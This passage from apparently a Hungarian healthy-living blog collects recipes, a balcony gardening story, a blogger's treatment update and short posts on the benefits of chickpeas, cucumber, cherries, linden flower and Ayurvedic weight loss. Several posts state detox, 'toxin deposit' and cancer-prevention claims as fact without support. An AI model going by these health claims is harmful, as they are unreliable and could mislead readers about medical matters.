nagyon jótékony - akár vezetett, akár saját magadban végzed - de ha kiegészíted jógagyakorlással, meditációval szinte csodákra képes:) A következő relaxációs gyakorlatot ki is próbálhatod és megtapasztalhatod a relaxáció áldásos hatásait. Ha szeretnéd a relaxáció anyagát le is tudod tölteni. https://www.youtube.com/watch?v=Rs829Lhc_Ug Ne aggódj ha úgy érzed a relaxáció elején még az elméd nyugtalan, hagyd a gondolatokat, érzelmeket tovatűnni. Jó pihenést, töltődést kívánok:) szeretettel: Kati
Almaturbánok
Három hozzávaló meg egy kis fűszer? Abszolút kezdőknek is ajánlom ezt a receptet, vagy akkor is, ha kb. semmi nincs otthon. Drága anyósom lepett meg nemrég ezzel a mindenmentes édességgel minket. Szerepeljen hát itt is ez a finomság , és bár az ötletgazda hárította, de mégiscsak a forrás megjelölésével.
Hozzávalók:
[...] Bővebben!
Termések a balkonon :)
Úgy alakult, hogy nem veteményes kertbe került néhány különleges paradicsom palánta, hanem balkonunkon kényszeredett termést hozni. Azért kényszeredett, mert egy hónapig az épületet állvány takarta felújítási munkálatok miatt és bizony láttam nem egyszer, hogy reggel a munkákat úgy kezdték meg a dolgozók, hogy egy sötét vastag fóliával letakarták a paradicsomokat. :( Arról ne is beszéljünk, hogy az állvány miatt kevesebb eső és napfény érte őket. (Por és apró törmelék annál inkább, miután a fóliát minden nap leszedték róluk, akaratlanul is aláhullott róla.) Ráadásul a letakart fóliának köszönhetően volt olyan palánta, amelyik - hiába volt karózva - elhajlott, lekonyult. Egy másik palántán épp a virágok sérültek meg, így aztán azóta is várom, hogy hozza a termését...(persze hiába). :(
Az egészben az volt még a fájdalmas, hogy az állvány felépítésekor már apró kis zöld gyümölcsöket láttam majdnem mindegyik növényen. E sok - sok megrázkódtatás után azonban most hétvégén mégis sikerült a növények gyümölcseinek egy részét leszedni. Szép érett paradicsomokat ettünk - a saját erkélyünkön elhelyezkedő paradicsomokról. Persze ennél több is lehetett volna, ha ez a sok zavaró tényező nem éri őket. Ezzel is megelégedünk. S szerencsére van 1-2 növény, amin még mindig ott virít a zöld paradicsom, várja, hogy beérjen.
Mellesleg a bosnyák piacon jutottam hozzá a palántákhoz. Minden péntek délelőtt (amikor kijutok pl. kora reggel munka előtt) van ott egy bácsi, Bugyi községből jár fel oda és hozza az aktuális portékáit. Sajnos az utóbbi hetekben nem láttam őt ott. Remélem, nincs semmi baj vele. Amikor megvettem a palántákat, ígérte, hogy júniusban ezekről már paradicsomot ehetünk. Így is lett. (Édesanyámnak is vettem, remélem, ők jobban jártak vele, bőségesen terem nekik a kertjükben.) Várom már, hogy a kedves bácsika ismét ott legyen a megszokott helyén, mert különleges (saját termesztésű) brokkolit árul egész nyáron, paradicsomot, tulipánpaprikát, cukkinit, barack-szezon idején még barackot is hoz kertjéből, és a sort nem is folytatom, már annyi mindent vettem és kaptam tőle...
Miért érdemes csicseriborsót fogyasztani?
2015. június 23. Élj harmóniában
A csicseriborsó nem olyan régen terjedt el Magyarországon, de Ázsiai és mediterrán vidékeken nagyon régóta jelen van. Magas fehérje tartalma miatt nagyon népszerű olyan kultúrákban ahol előnyben részesítik a húsmentes étkezést. Kevés kalóriát tartalmaz. Magas a vitamin és ásványi anyag tartalma (B1, B6 vitamin, folsav, foszfor, magnézium, kálcium, vas, cink). Kiemelkedő rost tartalma hozzájárul az egészséges emésztéshez, megszünteti a székrekedést és segít a bélfalakon lerakódott salakanyagoktól megszabadulni, csökkenti a koleszterinszintet. Cukorbetegek számára is nagyon kedvező a fogyasztása, mert segít normalizálni a vércukorszintet. A csicseriborsó rendszeres fogyasztása elősegíti a nyugodt alvást, mert magas a szerotonin tartalma - amely hozzájárul a megfelelő alváshoz és a jó kedélyállapothoz. Az ájurvéda szerint édes és fanyar ízzel rendelkezik. Csökkenti a Pitta-t és a Kapha-t és növeli a Vatat a szervezetben. A csicseriborsó lisztjét az ájurvédában bőrápolásra is hazsnálják. Főzés előtt célszerű egy éjszakára beáztatni. A megfőtt csicseriborsót felhasználhatod salátákba, zöldséges ételekbe gabonákkal fogyasztva:) Az egyik legkedveltebb belőle készült étel a hummusz. Vegyszermentes, (bio) csicseriborsót használj!
Vendégvárásra fel! - kecskesajtos céklás falatkák (gluténmentes, tojásmentes)
Végre itt a nyakunkon a nyár és az iskola szünet! Társasági életünk főszezonja! :-) Ilyenkor fellendül a szociális élet, gyakrabban látogat meg a család, előkerülnek a kerti bútorok, a kerti grill, beizzítjuk a kemencét, felpezsdül az élet az étkező asztal körül, és ellepik a házat, a teraszt, a kertet a vendégek. Szeretjük a nyarat! ;-) kecskesajtos-céklás-diós-cukkinis vendégváró falatok (gluténmentes, tojásmentes) Ilyenkor gyakran felmerül a kérdés, hogy de mit főzzek??? Mit tegyek az asztalra? Legyen látványos, és érdekes, hisz le kell nyűgözni a vendégeket, de azért ízletes is legyen. Ha pedig a hétköznapokban egészségtudatosan élünk, akkor megpróbáljuk a vendégeinknek is átadni ezt az élményt, táplálóbb, egészségesebb ételekkel, desszertekkel próbálunk készülni. Ráadásul manapság egyre több az ételallergiás ember, így a vendég is, akiket még több odafigyeléssel tudunk csak boldoggá tenni. kecskesajtos-céklás-diós-cukkinis vendégváró falatok (gluténmentes, tojásmentes) Van, aki nem szeret vendégül látni, és letudja egy gyors szupermarketes vásárlással, klasszikus rágcsálnivalókkal, "csak gyorsan legyünk túl rajta" stílusban. Mások - mint én is - pedig egyenesen imádják, ha nyüzsög a ház, lehet sürögni-forogni a konyhában, napokkal előre megtervezni a menüt, és begyűjteni a bókokat, amiket az asztalra tett ételekért kapunk. :-) kecskesajtos-céklás-diós-cukkinis vendégváró falatok (gluténmentes, tojásmentes) Ezen a trendi nyári témán elindulva, indítottam a Zöld Avocado blogon egy új "Vendégvárók" gyűjtő oldalt, mert rájöttem, hogy rengeteg receptem van, ami tökéletesen megfelel vendégváró falatoknak is. Látványosak, ízletesek, mindennap elkészíthetőek, de mégis nem mindennapiak. Sós és édes apróságok egyaránt szerepelni fognak a gyűjtésben. Természetesen több lesz a desszert, mert úgyis minden vendég arra vár! ;-) A nyári recept posztok főként vendégváró étel ötletek lesznek, széles választékkal ételallergiás vendégeink számára is. Remélem találtok majd kedvetekre valót, és sikerül lenyűgözni a nyári vendégsereget! :-) Hát akkor tápláló és egészséges "Vendégvárásra fel!" a Zöld Avocado gasztrobloggal. Tartsatok velünk! Az első recept egy cukkinis-céklás-kecskesajtos-diós könnyedén elkészíthető falatka lesz. A korábbi posztok közül átcsoportosítok néhányat a "Vendégvárók" oldal alá, így arra is kaptok már ötleteket. kecskesajtos-céklás-diós-cukkinis vendégváró falatok (gluténmentes, tojásmentes) HOZZÁVALÓK (kb.15 darabhoz): - 3 db kisebb cékla - 2 db közepes cukkini - kb.250 g kecskesajt (lehetőleg henger alakút vegyünk) - 1 bögre dió - 3 gerezd fokhagyma kecskesajtos-céklás-diós-cukkinis vendégváró falatok (gluténmentes, tojásmentes) ELKÉSZÍTÉS: A diót lepirítjuk egy serpenyőben, mert így sokkal intenzívebb az íze, majd ledaráljuk morzsára. A nyers cukkiniket alaposan megmossuk, majd felkarikázzuk kb.1 cm vastag karikákra. A céklát felhasználhatjuk nyersen (így tartalmazza a legtöbb ásványi anyagot, vitamint), vagy le is párolhatjuk. Én ezúttal a boltban kapható előfőzött céklát használtam. Ez a legkevésbé egészséges, de a legelterjedtebb módja a cékla fogyasztásnak. Azért a vendégváró falatoknak nem szabad nagyon rendhagyóaknak lenniük, mert lehet, hogy vendégeink nem elég rugalmasak az újításokra, és akkor éhen maradnak, mi meg dobhatjuk ki a gondosan elkészített ételeinket. Figyelni kell rá, hogy érdekes, és innovatív, de ne túl extrém ételeket tegyünk az asztalra a vendégeink elé. Tehát az általunk választott formában a céklákat felkarikázzuk kb.1 cm-es vastag karikákra. kecskesajt A kecskesajtot is kétféleképpen szervírozhatjuk ebben az étel "toronyban". Felhasználhatjuk önmagában, egyből a csomagolásból kivéve, vagy egy kicsit fokhagymás olajon lepirítva. Ehhez elővesszük az elektromos konyhai grill sütőnket és fokhagymás olajon lepirítjuk a kb.1 cm-es karikákra vágott kecskesajtot. Amikor elkezd pirulni a fokhagyma lekapcsoljuk a grillező alatt, és hagyjuk kihűlni. Ne piszkáljuk még melegen a kecskesajtot, mert szétmállik. Ha nem akarunk kínlódni a kecskesajt grillezéssel, de szeretnénk a fokhagyma ízt is az ételhet tenni, akkor amikor a diót pirítjuk, pirítsuk össze nyomott fokhagymával, és együtt daráljuk le. Miután kihűlt a fokhagymás kecskesajt, ráhelyezhetjük a cukkini - diós morzsa - cékla tornyunkra. A tetejét díszíthetjük egész dióval, és már mehet is a vendégek elé. Mutatós, tápanyagdús, és finom. ;-) kecskesajtos-céklás-diós-cukkinis vendégváró falatok (gluténmentes, tojásmentes) Tápanyagban gazdag, nevetéssel teli, Vendégvárásra fel! a Zöld Avocado-val! ;-) Megjegyzés1: Ha a diós morzsa nehezen kezelhető a torony építésnél, csepegtessünk rá egy kevés vizet, ami összetartja a morzsákat. Megjegyzés2: A kecskesajt - dió - cékla trió nálam nagyon népszerű, mert tökéletes ízharmóniát képeznek együtt. Ennek köszönhetően nem ez az első ilyen recept a Zöld Avocado gasztroblogon. Készítettem már nektek céklás nokedlit kecskesajttal, és pörkölt dióval, ami szintén népszerű volt! :-) Ebben a bejegyzésben olvashattok a kecsketej egészséges vonatkozásairól is. kecskesajtos-céklás-diós-cukkinis vendégváró falatok (gluténmentes, tojásmentes)
Miért érdemes uborkát fogyasztani?
2015. június 18. Élj harmóniában
A piacon már megjelent az uborka, ami sokak nagy kedvence. Nyári szendvicsek, saláták szinte elképzelhetetlenek nélküle:) Miért is érdemes fogyasztani? Kiváló frissítő hatással rendelkezik, segít hűsíteni a szervezetet. A 90%-a víz, ezért jól hidratálja a testet a nagy melegben - akár egy pohár víz helyett is fogyaszthatod:). Továbbá hozzájárul a vérnyomás normalizálásához. Sok vitamint és ásványi anyagot tartalmaz (A, C és B vitaminokat, káliumot, magnéziumot) Az uborka hozzájárul az immunrendszer erősítéséhez és nagyon jól energetizálja a testet. Segít a méregtelenítésben, aktivizálja a vese munkáját. Segíti az emésztést és rendszeres fogyasztásával megelőzhető a székrekedés. A benne található anyagok, elősegítik a fogyást, zsírégetést és csökkentik a koleszterinszintet. Továbbá köszvény és ízületi bántalmak esetén is hatásos Gyulladás gátló hatású és egyes helyeken azt írják, hogy rákmegelőző hatással is rendelkezik.
Könnyed, hatékony fogyás az ájurvéda segítségével
2015. június 16. Élj harmóniában
Az elmúlt hetekben sokan kerestetek meg azzal, hogy szeretnétek fogyni és segítsek. Sokan próbálnak valamilyen diétával vagy fogyókúrás termékkel lefogyni, melyek hosszútávon nem eredményesek. Az ájurvéda olyan ajánlásokat ad, melyek mindenki számára sikerrel alkalmazhatóak és könnyen beépíthetőek a hétköznapokba. Ne lemondj! Tanulj meg kielégítően étkezni és légy tudatos. Figyeld a tested jelzéseit, és amikor ennél, gondold végig mi a valós igényed. Valóban éhes vagy? Esetleg valamilyen más igényed van? (kimerültség, szeretethiány, idegesség, elégedetlenség, stressz) Próbálj mindig az eredeti igény kielégítésére koncentrálni. Erősítsd az emésztésed és fogyassz könnyű ételeket Az emésztésedért elsődlegesen az emésztés tüze az agni felel. Kerüld azokat az ételeket amelyek nem frissek (feldolgozott ételek, mirelitek, konzervek és maradék, állott ételeket), mert emésztési problémákhoz, puffadás, székrekedés, reflux, elhízáshoz vezetnek. Hogy az agnit megfelelően tápláld, fogyassz áurvédikus testalkatodnak megfelelő lehetőleg meleg ételeket, kerülj el minden hideg ételt, hideg italt, ezek is kioltják az emésztés tüzét és rontják az emésztés hatékonyságát. Ha nem elég erős az emésztés méreganyagok felhalmozódásához vezet (ama) és hozzájárulnak a túlsúlyhoz. A meleg ételek táplálják az emésztés tüzét, könnyebben beépülnek a szervezetbe. Használj emésztést segítő fűszerekkel (gyömbér, római kömény, kardamom, kurkuma, fekete bors) A tartós fogyás egyik alappillére, hogy ne egyél nehéz, kiadós ételeket, mert rontják az emésztés hatékonyságát . A vacsorád mindig nagyon könnyű legyen és minél közelebb vagy a lefekvés idejéhez, annál könnyedebb fogásokat válassz. A késő esti étkezések nagyon megterhelik a szervezetet, salakanyagok felhalmozódásához, túlsúlyhoz vezetnek. Este feltétlenül kerüld el húsokat, tojást, a túrót, sajtot, joghurtot, zsíros ételeket, süteményeket, édességeket, olyan ételeket amik nem frissek A vacsora könnyen emészthető vegetáriánus fogás legyen- egyél főtt gabonákat és párolt vagy pirított zöldségeket vagy leveseket. Egyél frissen Az ideális testsúly elérésnél fontos, hogy friss alapanyagokból, frissen készült ételeket egyél. A maradék ételek nem tartalmaznak a szervezet számára elegendő életerőt (pránát) és elfogyasztásuk a testben tisztátalan lerakódásokat hoz létre (ama). Ha étkezés után friss vagy és aktív, akkor sikerült feltöltened a szervezeted energiával, amennyiben az étkezés után fáradnak, elnehezültnek érzed magad, akkor nemhogy energiát termeltél volna az étkezéssel, de az elfogyasztott étel túl sok energiát von el a szervezetedtől. Készítsd otthon, magadnak frissen az ételeket. Kelj reggel fél- egy órával korábban és főzz egy egyszerű ebédet, amit dobozba, ételtermoszba vihetsz magaddal a munkahelyre. Élvezd az étkezéseket, étkezz változatosan Az étkezések okozzanak örömet számodra. Olyan ételeket készíts, melyek frissek, finomak, ízletesek. Az étkezésekre mindig szánj időt, ne egyél kapkodva és idegesen sem. Amikor eszel, ne foglalkozz mással. Minden falatot rágj meg alaposan, szentelj figyelmet az evésre és élvezd ki az ízeket. Az egészséges táplálkozás egyik alapja a változatos, kiegyensúlyozott étrend. Minden egyoldalú diéta, táplálkozási irányzat hosszú távon magában hordozza a hiánybetegségek kialakulásának lehetőségét Ha változatos az alapanyag felhasználásod akkor biztos, hogy mindent megadsz a szervezeted számára. Amikor valami hiányzik a szervezetednek, akkor a szervezet sóvárgással reagál, mert hiába eszel, ha a sejtek éheznek. Ha kiegyensúlyozottan étkezel, akkor nem lesz hiányérzeted és nem érzed, hogy feltétlenül kellene valamit csipegetned. Fogyassz sok teljes értékű gabona félét (rizs, hajdina, kukoricadara, quinoa, amarant, kuszkusz, árpa), hüvelyeseket, zöldségeket, gyümölcsöket. Csökkentsd a só és az édességek fogyasztását Ne nassolj - ha nem bírsz ellenállni, válassz egészséges nasikat (zöldség, gyümölcs, aszalt gyümölcs, magvak, diófélék) Időzítsd jól az étkezéseket Azonos időpontokban, rendszeresen egyél, ne akard kihagyni az étkezéseket. Egyél reggelit és az ebéd legyen a nap legkiadósabb, legtáplálóbb étkezése. Az emésztésed tüze az agni 12 és 13,14 óra között a legerősebb, ilyenkor képes a szervezeted leginkább megemészteni a nehezebb ételeket és a nagyobb adagokat. A vacsorát lehetőleg este 18-19 óráig fogyaszd el. Este 22:00 után már ne egyél. Meditálj A meditáció békésebbé, fegyelmezettebbé, nyugodtabbá teszi az elmét. Ez segít abban, hogy az ételek utáni mohó vágyad csökkenjen és növeld az önbizalmad és önuralmad. Segíts a szervezetednek a lerakódások eltávolításában Az egyik legjobb módszer az Ájurvédában a forralt víz kortyolgatása, mert segíti az emésztés (agni) működését, megtisztítja az emésztőrendszert és az egész szervezet a méreganyagoktól, lerakódásoktól. Forralj fel reggel tiszta minőségű vizet (pl forrásvíz) kb 10-15 percig - így a víz lágyabb lesz és jobban energetizálja a szerveztet. A vizet tedd termoszba és melegen kortyolgasd a nap során lehetőleg fél óránként. Mozogj rendszeresen A testmozgás javítja az emésztést, segít megszabadulni a fölös kilóktól, kedvezően befolyásolja a közérzeted, energiával tölt fel. Ájurvédikus alkatodnak megfelelően, jógázz, sétálj, végezz valamilyen könnyed, egészséges testmozgást. A fogyás elősegítésére a jóga számos gyakorlatot kínál, melyek segítik felpörgetni az emésztést és a méregtelenítést valamint nagyon sok jógapozíció segít a túlsúly, a hasi háj, a fölös kilók eltüntetésében. A testmozgást építsd be a hétköznapjaidba is. Busz helyett sétálj néhány megállót, lift helyett lépcsőzz, napközben többször állj fel, mozgasd át magad. Aludj eleget Ha nem alszol eleget és a szervezeted energia hiánnyal küzd, folyamatosan késztetést érezhetsz arra, hogy egyél. A kevés alvás rontja az emésztés hatékonyságát is és könnyen túl súlyhoz vezet. Lefekvés ideje lehetőleg este 22:00 előtt legyen. Ezt követően a szervezeted elkezdi feldolgozni a salakanyagokat. Ha nem fekszel le időben, akkor a szervezet nem tud megfelelően méregteleníteni. Az ideális testsúly és az egészség kulcsa a mindennapokban, életvitelünkben rejlik. Változtass életmódot és megtapasztalhatod az ideális testsúlyt, a boldogságot, könnyedséget különösebb erőfeszítések és lemondások nélkül. Mindig apró célokat tűzz ki magad elé és örülj az elért eredményeknek. Lépésről lépésre... türelmesen várd, hogy beinduljon a fogyás és figyeld ahogy átalakul a tested és az életmódod:)
Eperturmix last minute
Még akad a földeken (és a piacokon) itt-ott-amott eper. Sajnos azonban már leáldozóban van a szezonja. Mielőtt búcsút vennék a friss epertől egy újabb évre, egy turmix (másoknak smoothie vagy shake, noha tejet, növényi tejet nem tartalmaz) receptet ajánlok mindenkinek. Megédesíti a reggelünket, jól indul vele a nap.
A recept:
Hozzávalók:
1 nagy marék eper
1 vagy 2 alma
víz
édes íz kedvelőinek valamilyen szirup, pl. datolyaszirup, vagy méz (ha fogyasztanak mézet)
Elkészítés:
A gyümölcsöket megmossuk. A turmixgép poharába először az almát szeleteljük, majd a megmosott, levelétől megfosztott eperszemeket is beletesszük. Felöntjük egy kevés vízzel (ekkor kell az édesítőt is beletenni) és a turmixgéppel alaposan összeturmixoljuk. Nem csak laktató reggeli ital, de a reggeli felfrissülésben is segít.
Rebarbara-narancs lekváros diós muffin (gluténmentes, laktózmentes, tojásmentes, vegán)
Rebarbara... egy furcsa és a magyarok számára kissé idegen zöldség, melyből főleg édességek, sütemények, lekvárok készülnek. Az elmúlt pár hétben jó pár magyartól hallottam, hogy "de mi az a rebarba, hogy néz ki, és milyen íze van?". Bevallom őszintén 1 évvel ezelőttig én sem tudtam, annak ellenére, hogy nyugat-európában tele vannak a boltok polcai vele áprilistól-júliusig. Emlékszem, hogy fogalmam sem volt mire fogom felhasználni, de láttam, hogy mindenki beteszi a bevásárló kosarába, ismerős volt a neve, és még érdekesen is nézett ki, ezért hát úgy döntöttem, lesz, ami lesz, vegyük meg, és majd kitalálunk mellé valami receptet. ;-) Az első receptet az Interneten találtam. Még ismeretlen volt számomra ez a misztikus zöldség, ezért nem vagánykodtam, és egy az egyben lemásoltam, amit a neten találtam. Nem mondom, hogy rossz volt, mert elfogyott, de nem váltunk rebarbara kedvelőkké tőle. Az első találkozás nem volt maradandó élmény... Eljött az idei rebarbara szezon is, és újra megpróbálkoztam vele. Ezúttal már bátrabban mertem újítani, és a végeredmény valami fenomenálisan finom lett! :-) A narancsos rebarbara lekvár abbahagyha tatlanul finom, és a diós tészta tökéletesen kiegészíti a rebarbara fanyar mégis édes ízét. A kanál nyalogatás kihagyhatatlan része a sütemény készítésnek ebben az esetben. Avatatlan vendégeknek is megvolt az első nagy találkozás ezzel az ismeretlen zöldséggel, és ők is imádták ezt a süteményt! Szóval kedves Olvasóm, ha még nem kóstoltál rebarbarát, akkor ez egy tökéletes lehetőség rá, hogy megszeresd! :-) "A rebarbara rosttartalma különösen magas, különleges és finom összetevője lehet egy tavaszi méregtelenítő, béltisztítókúrának. A rebarbara levele mérgező, húsos, pirosas szára viszont finom, egészséges és diétás nassolnivaló lehet. Mivel 100 gramm rebarbara csak 16 kalóriát tartalmaz, bűntudat nélkül fogyaszthatod akár reggelire, akár uzsonnára. Ám jellegzetes, fanyar ízét ne cukorral próbáld meg tompítani, inkább egyél hozzá más gyümölcsöket, például banánt vagy epret. A rebarbara gazdag A-, B1-, B2- és C-vitaminban, így segít beindítani a zsírégetést, flavonoidjainak köszönhetően fokozza az anyagcserét, káliumtartalmának köszönhetően pedig kiváló vízhajtó is. A népi gyógyászat székletlazító, bélműködés-szabályzó tulajdonsága miatt is használja. A rebarbaráról fontos tudnod, hogy oxálsavat tartalmaz, ami rossz hatással lehet a szervezeted kalciumháztartására, ám ahhoz, hogy ez a negatív hatás érződjön, napi egy kilogramm rebarbarát is meg kellene enned." Forrás: Femina Bár a rebarbara alacsony kalória tartalmának, és vízhajtó hatásának köszönhetően diétás ételnek számít, ez a recept elég sok édesítőszert tartalmaz, így egyáltalán nem mondanám fogyókúrás süteménynek. Előnyére váljon azonban, hogy sem fehér lisztet, sem fehér cukrot, sem semmilyen nehezen emészthető hozzávalót nem tartalmaz. Sokkal könnyebben emészthető, mint egy hagyományos bolti sütemény, így várhatóan nem parkol sokáig a testünkben. Ez a diós muffin, narancsos rebarbarás lekvárral, egyszerűen és gyorsan elkészíthető, egészséges, glutén-, tojás- és laktózmentes édesség. Látványos és rendhagyó, így ételallergiás vendégeknek is bátran kínálható! ;-) (Kivéve a dió allergiásokat.) HOZZÁVALÓK: (12 db muffinhoz) - 100 g mandula liszt vagy darált mandula - 70 g rizsliszt - 100 g darált dió (ha előre beáztatjuk, könnyebben emészthető) - 60g édesítőszer (lehet Xilit, Eritrit, vagy barna nádcukor) - 2 dl növényi tej (mogyoró tej vagy mandula tej a legjobb) - 1 tk őrölt fahéj - 1/2 tk szódabikarbóna - 6 ek kókusz olaj - - 5 szál rebarbara (kb.350 g) - 40 g édesítőszer (lehet Xilit, Eritrit, vagy barna nádcukor) - 1 nagy érett narancs ELKÉSZÍTÉS: A muffin tészta száraz és folyékony hozzávalóit dolgozzuk külön-külön össze, majd keverjük egybe, és tegyük a választott sütő formánkba. Előmelegített sütőben, 190°C fokon 30 perc alatt elkészül az illatos tészta. A lekvárhoz a rebarbarákat megtisztítjuk a fás végektől, alaposan megmossuk, és éles késsel kb. 1 cm-es darabokra vágjuk. (A piros héj maradhat.) Egy lábasban (fedő nélkül), közepes lángon feltesszük főni a rebarbara darabokat, összekeverve a választott édesítőszerrel, és 1 nagy narancs frissen facsart levével. Addig főzzük kevergetés mellett, míg meg nem sűrűsödik a lekvár. Ha túl híg lett, tegyünk hozzá 1 ek útifűmaghéjat, vagy csöpögtessük le egy szűrőben. Kihűlés után kanalazzuk a diós tészták tetejére. Nagyon finom és nagggyon puha desszertet kapunk, még kihűlés után is! :-) Kínáld meg a vendégeidet is gyomor barát, tápláló, de mégis finom desszertekkel! ;-) Megjegyzés: A képeken is jól látható, hogy nem hagyományos muffin sütőt használtam. Nem kell megijedni, mert ilyen sütőforma nincs otthon neked, kedves Olvasó! A hagyományos muffinok tetejére is rá lehet a lekvárt kanalazni. Az ízén semmit nem változtat a forma, ahogyan elkészíted! :-)
Miért érdemes cseresznyét enni?
2015. június 10. Élj harmóniában
A nyár egyik közkedvelt gyümölcse a cseresznye, amelyet már az ókorban is nagyon sokra tartottak és gyógyászati célokra is használtak. A cseresznye rendszeres fogyasztása segít megszabadítani a szervezetet a lerakódott méreganyagoktól, komoly antioxidáns hatással rendelkezik és így hozzájárul a szervezet öregedési folyamatainak lelassításához. Tisztítja a vért, így ízületi gyulladásra is nagy segítséget jelent. Segít eltávolítani a szervezetből a fölösleges vizet, kiváló vízhajtó. Kedvező hatása van az emésztőszervekre, megszünteti a székrekedést és jótékonyan befolyásolja a gyomorsavtermelését. A cseresznyefogyasztás erősíti az immunrendszert, növeli a szervezet védekező képességét. Nagyon magas a vitamin és ásványi anyag tartalma, így hiányállapotok kezeléséhez is alkalmas (kálium, kalcium, foszfor, cink, magnézium és vas, A, B és C- vitamin). Kimerült, legyengül állapotban jó segítség lehet. Ez a csodás kis piros gyümölcs kedvezően befolyásolja a hormontermelést és a bőrünket is széppé, egészségesebbé teszi. A cseresznyét legjobb frissen fogyasztani, de ha éppen nem tudunk frissen szedni aszalt formában is sok jótékony hatása érvényesül. Nemrégiben egy kedves ismerősömtől hallottam egy praktikát a cseresznye magjának felhasználására. Ő úgy használja fel a magokat, hogy alaposan megtisztítja, majd jól kiszárítja. A kiszárított magokat kis zsákba varrja és ha télen fázik, vagy fáj valakinek a dereka, füle a családban ezt a kis zsákot átmelegíti és mint a babzsákot használja:) Vegyszermentes (bio) cseresznyét válassz:)
Betegségemről még pár szó
2015. június 9. Mindennapi ételeink
Nagyon köszönöm azt a sok kedves üzenetet, levelet és kérdést is, amit tőletek kaptam a betegségemről szóló bejegyzés után. Úgy érzem, ezért tartozom nektek egy "állapotközléssel": a 3 hónapos gyógyszeres terápiám lejárt.... Azonban egy újabb 3 hónapos kezelés vár rám. Ugyanis a vírusszám nullára csökkent, de sajnos van esély a kiújulására, és az orvosom szerint, ha ilyen erős kezelés után újul ki, nagy eséllyel ellenálló lesz későbbi gyógykezelésekre. Így sajnos még nem kezdhetem el a májregenerációt, a léböjtöt, ill. immunerősítést, béltisztítást sem, meg kell várni az újabb 3 hónap végét. Sajnos fényérzékeny lettem a gyógyszer hatására, és Fannival nem megoldható, hogy ne menjek napra. Így ez is újabb nehézséget okoz hetek óta. 50-es faktorszámú naptej segítségemre van, de szívesen olvasok tippeket, attól, aki hasonlóan járt. Emellett nagy valószínűséggel inzulinrezisztencia alakult ki nálam, mint a betegség tünete, ezt is orvosolnom kell, diétával. Sajnos enélkül sincsen sok erőm, szóval alaposan utána kell olvasnom, tanácsot kell kérnem, mivel pótoljam a szénhidrátot. (Finomlisztes kenyeret, cukrot már pótlom régóta). A szédülés, gyengeség, fejfájás, székrekedés (mint állandó mellékhatások) is kísérőim lesznek, újabb 3 hónapig. Visszaszámlálás ismét indul! Szép nyarat kívánunk, hamarosan recepttel is érkezünk.
Az a csodás illatú hársfavirág
A kertünkben két gyönyörű hársfa is van, épp a napokban lepték el a méhecskék. Iszonyú munkatempóban döngicsélnek, és az az illat, ami belengi a kertet, az valami fantasztikus. A gyerekek persze félelemmel menekülnek a közeléből, de azért az illata őket is elvarázsolja. Nézzük is meg közelebbről, hogy miért is olyan különleges ez a fa. Bizonyára sokan tudják, hogy a hársfa virága kitűnő gyógynövény, melynek a gyűjtése az elkövetkező hetekben történik. Rendszertanilag a mályvavilágúak, azon belül a hársfélék családjába tartozik. Ha figyelmesen járunk-kelünk az utcán, vagy éppen az erdőben, többféle hársfával találkozhatunk. Megkülönböztetünk orvosi (kislevelű, nagylevelű, széleslevelű) és ipari hársfavirágot (ezüst- és molyhos levelű). Elsősorban a levél méretében van különbség, de a fa formája is jelentős eltérést mutat. Általánosságban elmondható, hogy lombhullató, akár 40-50 méter magasra megnövő, terebélyes fáról van szó. levelei szórt állásúak, nyelesek, asszimetrikusak, fűrészes szélűek. A virágzati tengelyhez hozzánőtt a világoszöld, nyelvszerű, hártyás murvalevél , mely a gyűjtés során a virággal együtt szintén a kosarunkba kerül. És most nézzük a különbségeket. A kislevelű hárs koronája gömbölyű, levelei sötétzöldek, a fonákon világosabbak és az érzugokban rozsdavörös szőrpamacsok figyelhetők meg. Virágzata 5-15-ösével álló álernyőt képező sárga virágok, melyek június második felétől nyílnak. Ugyanakkor a nagylevelű hárs koronája megnyúlt, ovális. Levelei nagyok, mindkét oldaluk élénkzöld , a fonák részén az érzugokban fehér vagy sárgás szőrképletekkel. Virágzata 2-5 virágból áll, mely már május végén elkezd virágozni. Gyakori díszfa az ezüstlevelű hársfa , melynek a virága NEM gyűjthető drogként. Ugyanakkor ipari (borászati) célra ezt is felhasználják, elsősorban a zamat- és színanyagának köszönhetően. Ezek levelei sötétzöldek, fonákjukon ezüstösen fehéren molyhosak. Az erek elágazásában nincsenek szőrcsomók. Virágzata 5-13 virágúak, melyek szintén június közepétől nyílnak. Hogyan gyűjtsük a virágát? Az közismert, hogy a hársfának a virágát gyűjtjük, de hogyan és miképp tegyük azt? A gyűjtés során figyelembe kell venni, hogy ugyanazon virágzat virágai nem egyidőben nyílnak. De általános szabály az, hogy a virágzatok legalább 2/3-a kinyílt, és 1/3-a erősen pattanó bimbós legyen . Jó szellős, de árnyákos helyen szárítsuk ki, melynek az illata szárítás után is kellemes édeskés. Mi mindenre használhatjuk a hársfa virágzatát? A kamillavirág után talán a hársfavirág az, amit nagyon sokan ismernek és használnak is. Elsősorban légúti betegségek esetén alkalmazzuk, mivel kiváló izzasztószer, köptető, nyálkaoldó, lázcsillapító. Ezenkívül immunerősítő, nyugtató, vizelethajtó, görcsoldó hatással is bírnak. Külsőleg száj- és toroköblítő, gargalizálhatunk vele . Fürdővízbe tehetjük, mivel viszketés ellen, bőrrepedések, rovarcsípések esetén alkalmazható. A hársfa fájából készül az orvosi szén, melynek egy fajtáját7 bélfertőzések, vastagbélhurut esetén alkalmazzák. Ki ne ismerné a hársméz gyógyító hatását, mely minden esetben termelői, hőkezeletlen méz legyen. Légúti betegségek esetén szintén kiválóan alkalmazható. Hogyan készítsünk belőle teát? A hársfavirág esetében forrázatot szoktunk készíteni, a pontos elkészítéséről itt olvashatsz.
Epres jégkrém
Jégkrémből sosem elég. Kedvenc gyümölcsömet, az epret előszeretettel használom édességekhez, a gyerekeim nagy örömére. Tavaly vettem egy 6 db-os jégkrémformát, így a fagyasztása is roppant egyszerű. Természetesen fagylalt is lehet belőle, ebben az esetben a fagyasztás során óránként jó alaposan keverjük fel. Kb. 5 óra elteltével kész is a fincsi epres fagyi. Hozzávalók: - 2,5 dl kókuszkrém - 30 dkg érett, hazai eper - 2 evőkanál juharszirup - 1 kávéskanál vaníliapor - 1/2 kávéskanál fahéj - löttyintésnyi rum vagy gyógybor Elkészítése: - Az epret alaposan mossuk meg, majd mindent turmixoljunk össze. - Töltsük meg a jégkrémformát, és fagyasszuk készre.
Kedvezményes áru finomságok :-)
2015. június 3. Mindennapi ételeink
